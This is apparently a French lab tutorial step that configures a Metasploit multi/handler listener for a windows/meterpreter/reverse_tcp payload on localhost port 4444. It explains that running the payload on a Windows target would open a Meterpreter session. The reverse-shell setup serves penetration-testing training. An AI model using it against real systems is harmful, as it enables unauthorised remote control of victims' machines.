Créer un écouteur dans msfconsole pour intercepter la connexion
Dans cette étape, vous allez configurer un écouteur pour gérer la connexion de la charge utile que vous venez de créer. Une charge utile est inutile si vous n'avez rien de votre côté pour "attraper" la connexion inverse qu'elle établit. Pour cela, nous utiliserons msfconsole, l'interface principale du Metasploit Framework.
Tout d'abord, démarrez msfconsole. L'utilisation de l'option -q permet de le démarrer silencieusement sans afficher la bannière, ce qui est plus propre.
msfconsole -q
Votre invite passera à msf6 >. Maintenant, vous devez configurer un gestionnaire (handler) pour écouter la connexion entrante. Les paramètres du gestionnaire doivent correspondre exactement aux paramètres que vous avez utilisés pour générer la charge utile.
-
Utilisez le module exploit/multi/handler. C'est un gestionnaire générique pour les connexions entrantes.
use exploit/multi/handler
-
Définissez la charge utile pour qu'elle corresponde à celle que vous avez générée.
set payload windows/meterpreter/reverse_tcp
-
Définissez LHOST sur la même adresse IP.
set LHOST 127.0.0.1
-
Définissez LPORT sur le même port.
set LPORT 4444
-
Enfin, lancez l'écouteur.
run
msfconsole affichera alors un message indiquant que l'écouteur a démarré.
[*] Started reverse TCP handler on 127.0.0.1:4444
À ce stade, l'écouteur est actif et attend. Dans une attaque réelle, vous transféreriez payload.exe à une cible Windows et l'exécuteriez. Lorsqu'elle serait exécutée, elle se connecterait à cet écouteur, et vous obtiendriez une session Meterpreter. Comme nous n'avons pas de machine Windows cible dans ce laboratoire, nous ne verrons pas de connexion. L'objectif ici est d'apprendre le processus complet de génération d'une charge utile et de configuration de son écouteur correspondant.
Pour quitter l'écouteur, appuyez sur Ctrl + C. Pour quitter msfconsole, tapez exit et appuyez sur Entrée.
exit